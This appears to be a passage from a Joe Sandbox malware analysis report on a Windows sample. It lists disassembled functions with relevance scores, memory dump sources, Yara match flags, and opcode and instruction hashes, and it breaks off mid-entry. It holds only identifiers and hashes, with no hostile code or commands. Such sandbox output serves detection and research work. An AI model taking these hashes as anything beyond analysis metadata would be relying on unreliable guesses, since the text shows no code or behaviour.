                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $
                    • API String ID: 0-3993045852
                    • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                    • Instruction ID: 32ab170cfcd4034d2d0f5718310fd8daa8b0e421715a9534897c653a3cfabe05
                    • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                    • Instruction Fuzzy Hash: A63262B0E14329DADF609FA4CC44BAEB7B9FF44704F0441EAEA0CA6154DB758A84CF59
                    Function 004111D0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00011160), ref: 004111DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 3987a53ffa314a93cda979505520da2c944e3b56562506a9644f075f44461997
                    • Instruction ID: 158fde3239c07941d6574ff93114a2568dd595bfe83a6f7d7f9d23c8a5e80113
                    • Opcode Fuzzy Hash: 3987a53ffa314a93cda979505520da2c944e3b56562506a9644f075f44461997
                    • Instruction Fuzzy Hash: B4B0123114420C37830113E26C09803BB9CC5C876135101A1F21CD1021D8B298108059
                    Function 021F5DF7 Relevance: .7, Instructions: 723COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                    • Instruction ID: 0c7148ab4a13de8e3be26c82c66da848815f9fe442e57b045bd839d96dd31254
                    • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                    • Instruction Fuzzy Hash: 3F42C071629F119BC3DAEF24C88055BF3E1FFC8218F048A1DD99997A50DB38F819CA91
                    Function 021FA026 Relevance: .5, Instructions: 478COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                    • Instruction ID: 86001e3d666a7c6176797d2b87b3064e08453b2f513ef5bd8267e546c8943e88
                    • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                    • Instruction Fuzzy Hash: 4822CF76508B028FC754CF19D08055AF7E1FF88324F158A6EE9ADA7B10D734BA55CB81
                    Function 021F2B60 Relevance: .4, Instructions: 443COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                    • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                    • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                    • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                    Function 021F3520 Relevance: .4, Instructions: 427COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                    • Instruction ID: b0d9fbead001bd204356bb7df64ceef27dd0e72994dbd85a7ff46487bf36e3e0
                    • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                    • Instruction Fuzzy Hash: C0028D711187058FC756EE1CD49035AF3E2FFC8309F198A2CD69987B64E739A9198F82
                    Function 021F89D0 Relevance: .4, Instructions: 351COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                    • Instruction ID: 0490af866f082f7bb2b0264c3a122ed955ebcd406bf68e4be03089badf4c10c1
                    • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                    • Instruction Fuzzy Hash: A4C12833E2477906D764DEAE8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                    Function 021FB0B0 Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                    • Instruction ID: b28eeb0ed17f7a42675113f6c7a951b0c3bc770d0c6acaaf0968ff8e936ec8df
                    • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                    • Instruction Fuzzy Hash: 65A1EA0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50
                    Function 021F30F0 Relevance: .3, Instructions: 336COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                    • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                    • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                    • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                    Function 021FCA10 Relevance: .3, Instructions: 280COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                    • Instruction ID: aab63bb9867a83886cba4b656975e0c08ba1da01e5a5f0bf77815cf91a71cfe3
                    • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                    • Instruction Fuzzy Hash: E8C18EB5E003599FCB54CFA9C881ADEFBF1FF48204F24856AD919E7301E334AA558B94
                    Function 021F5DE7 Relevance: .3, Instructions: 278COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                    • Instruction ID: 192e72a692aac8b893229e4d69ae4ff276460d0a74016f87c8b55cb7b25e8f77
                    • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                    • Instruction Fuzzy Hash: 34B183A0039FA686CBD3FF30911024BF7E0BFC525DF44194AD99986864EB3EE94E9215
                    Function 021F7520 Relevance: .3, Instructions: 251COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                    • Instruction ID: b33eb0663830f87baf6f511717312f32541c7e945ca858cb24abe5065e21cf8b
                    • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                    • Instruction Fuzzy Hash: A59114739187BA06D7609EAE8C441B9B6E3AFC4210F9B077ADD9467282C9309E0697D0
                    Function 021FC760 Relevance: .2, Instructions: 239COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                    • Instruction ID: b2299b7ca5da49d1617fce8f77f671b1f3780aa103ec1420b00a2926a52e9710
                    • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                    • Instruction Fuzzy Hash: D1B17AB5E002199FCB84CFE9C885ADEFBF0FF48210F64816AD915E7301E334AA558B94
                    Function 021FA916 Relevance: .2, Instructions: 227COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                    • Instruction ID: 5a1f579eb6d8491b23e15a53a66e419329f50e7c728271dc96ed1ca6b4b767c2
                    • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                    • Instruction Fuzzy Hash: 9071D473A20B254B8314DEB9CD94192F2F1EF88610B57C27CCE85D7B45EB31B95A96C0
                    Function 004F0B71 Relevance: .2, Instructions: 218COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                    • Instruction ID: 76cf4d2e5c1096527ce471f7c6d09bb418d57b8a9b11d9660f30dfcd3786fa85
                    • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                    • Instruction Fuzzy Hash: 31819631604B458FC728DF29C8906AAB7E2EFD5314F148A2ED1EA87752D738F449CB49
                    Function 021F59F7 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                    • Instruction ID: 22db49acb91016d9b0e1033020a856027d95510b9ad4666d64f4c11188e5d981
                    • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                    • Instruction Fuzzy Hash: A68137B2A047019FC328CF19D88566AF7E1FFD8210F15892DE99E83B41D770F8558B92
                    Function 021F8E60 Relevance: .2, Instructions: 207COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                    • Instruction ID: 654d29d18064df98c85feaef1f2d486c8a66f0597f78dd3a1767d4bcd8b946d3
                    • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                    • Instruction Fuzzy Hash: FA710622535B7A0AEBC3DA3D881046BF7E0BE4910AB850956DCD0F3181D72EDE4E77A4
                    Function 021FA699 Relevance: .2, Instructions: 197COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                    • Instruction ID: 1c93b8d5541f7a09e3bd27d56de04134beb3e9111b491493d44002dd36c20b10
                    • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                    • Instruction Fuzzy Hash: CA815875A10B669BD754CF2AC8C045AFBF1FF08210B518A2ADDA983B40D338F561CF90
                    Function 021F9120 Relevance: .2, Instructions: 160COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                    • Instruction ID: 81d1eb15ac93d248553ed003a8474a2f5e0b269544ae3b4d035d409650197535
                    • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                    • Instruction Fuzzy Hash: B561A3339046BB5BDB649E6DD8401A9B7A2BFC4320F5B8A75DC9823642C234EA11DBD0
                    Function 021F7A80 Relevance: .2, Instructions: 152COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                    • Instruction ID: 0dabe5032036adbb9c7f3a75d228461b83c8de4482462268be8186d898011c24
                    • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                    • Instruction Fuzzy Hash: 80617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                    Function 021F7880 Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                    • Instruction ID: afd04743a929a554c7de48fdca04567d0b0042abb30e2fcd161b825d1e751e13
                    • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                    • Instruction Fuzzy Hash: 1451FD229257B945EBC3DA3D88504BEBBE0BE49106B460557DCD0B3181C72EDE4DB7E4
                    Function 021F7220 Relevance: .1, Instructions: 128COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                    • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                    • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                    • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                    Function 0215471C Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276700726.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2153000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                    • Instruction ID: 6ff1a9d729ccda8aee540e67712104012ec5ffc1297e3607786d2fc4e8f1df7b
                    • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                    • Instruction Fuzzy Hash: 6631673984A291DFDB15CE70D890AB5BB71EF87224F1996EDC8D18B106D336A08BC794
                    Function 021F70E0 Relevance: .1, Instructions: 99COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                    • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                    • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                    • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                    Function 021F7393 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                    • Instruction ID: 52d7727f802758d9fdcd04054123176bb751e4612d4b2649a1b5eaec25750f75
                    • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                    • Instruction Fuzzy Hash: 753114305183419FD741EF29C480A4BF7E1FFC9358F01D919F99897261D730E989CA62
                    Function 022118D0 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: f02e63f185e02ceb1297e7197322275edb6b296fd99fe1b243c9ac23a2896b2c
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: E1113BB722108343D73886ADD4B4EBBE3D5EBE612872C427AD36A4B65CD332D161D900
                    Function 021FB000 Relevance: .1, Instructions: 71COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                    • Instruction ID: e45735c261bcae801529a6147efe1d57ca588cd01f7aa5f4ede8d998260dc71d
                    • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                    • Instruction Fuzzy Hash: 11113D0A8492C4BDCF424A7880E56EBEFA58E2B218F4A71DA88D44B743D01B150FE7A1
                    Function 021530A3 Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276700726.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2153000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: 3b4354fc45c9204eec3f19080b7d42a9adf2924d6aeabef09c05008f2280d782
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 18117072780210EFD754DE55DCC1EA673EAEB89260B1980E5ED28CB312D775E842C760
                    Function 021F0042 Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: 03af593ef386729870559fad7003956baa72e0f74d5e0904b9565fecf963093c
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 94118272380100AFD754DF65DC90FA673EAEB8C360B198155EE18CB716D776E841C760
                    Function 021FA79A Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
